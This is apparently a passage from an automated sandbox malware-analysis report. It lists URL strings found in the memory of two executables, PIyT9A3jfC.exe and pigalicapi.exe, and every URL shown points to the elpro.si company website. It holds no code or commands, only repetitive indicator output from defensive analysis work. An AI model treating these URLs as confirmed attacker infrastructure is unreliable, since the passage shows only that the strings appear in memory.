PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/ex/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/kalibracija/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/monitoring/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/nivo/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/prenosno/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/regulacija/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/temperatura/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/tlak/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/podrocje-uporabe/vlaga/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/predstavitev-novega-partnerja-batemika/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/privacy-policy/
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/temperaturno-tipalo-z-zascitno-cevjo/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-admin/admin-ajax.php
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/Elpro_E-64x64.png
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/Elpro_E.png
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Analiza-plinov.svg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Kalibracija.svg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Nivo.svg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Regulacija.svg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Temperatura.svg
                  Source: pigalicapi.exe, 00000004.00000003.791858177.0000000003280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/wp-content/uploads/2020/02/ICO-75-Tlak.svg
